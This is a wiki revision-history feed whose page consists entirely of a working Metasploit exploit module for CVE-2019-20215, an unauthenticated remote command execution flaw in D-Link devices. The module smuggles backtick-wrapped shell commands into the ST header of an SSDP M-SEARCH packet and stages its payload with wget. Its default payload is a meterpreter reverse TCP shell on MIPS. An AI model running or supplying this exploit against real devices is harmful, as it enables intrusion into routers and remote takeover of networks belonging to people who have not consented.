https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2019-20215_D-Link_Devices%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2019-20215 D-Link Devices未經身份驗證遠程命令執行漏洞 - Revision history
2026-04-16T09:35:09Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2019-20215_D-Link_Devices%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1289&oldid=prev
Pwnwiki: Created page with "==MSF EXP== <pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitMo..."
2021-04-09T02:42:13Z
<p>Created page with "==MSF EXP== <pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitMo..."</p>
<p><b>New page</b></p><div>==MSF EXP==<br />
<pre><br />
##<br />
# This module requires Metasploit: https://metasploit.com/download<br />
# Current source: https://github.com/rapid7/metasploit-framework<br />
##<br />
<br />
class MetasploitModule < Msf::Exploit::Remote<br />
Rank = ExcellentRanking<br />
<br />
include Msf::Exploit::Remote::Udp<br />
include Msf::Exploit::CmdStager<br />
<br />
def initialize(info = {})<br />
super(update_info(info,<br />
'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',<br />
'Description' => %q{<br />
D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.<br />
},<br />
'Author' =><br />
[<br />
's1kr10s',<br />
'secenv'<br />
],<br />
'License' => MSF_LICENSE,<br />
'References' =><br />
[<br />
['CVE', '2019-20215'],<br />
['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']<br />
],<br />
'DisclosureDate' => 'Dec 24 2019',<br />
'Privileged' => true,<br />
'Platform' => 'linux',<br />
'Arch' => ARCH_MIPSBE,<br />
'DefaultOptions' =><br />
{<br />
'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',<br />
'CMDSTAGER::FLAVOR' => 'wget',<br />
'RPORT' => '1900'<br />
},<br />
'Targets' =><br />
[<br />
[ 'Auto', { } ],<br />
],<br />
'CmdStagerFlavor' => %w{ echo wget },<br />
'DefaultTarget' => 0<br />
))<br />
<br />
register_options(<br />
[<br />
Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])<br />
])<br />
end<br />
<br />
def exploit<br />
execute_cmdstager(linemax: 1500)<br />
end<br />
<br />
def execute_command(cmd, opts)<br />
type = datastore['VECTOR']<br />
if type == "URN"<br />
print_status("Target Payload URN")<br />
val = "urn:device:1;`#{cmd}`"<br />
else<br />
print_status("Target Payload UUID")<br />
val = "uuid:`#{cmd}`"<br />
end<br />
<br />
connect_udp<br />
header = "M-SEARCH * HTTP/1.1\r\n"<br />
header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n"<br />
header << "ST:#{val}\r\n"<br />
header << "Man:\"ssdp:discover\"\r\n"<br />
header << "MX:2\r\n\r\n"<br />
udp_sock.put(header)<br />
disconnect_udp<br />
end<br />
end<br />
</pre></div>
Pwnwiki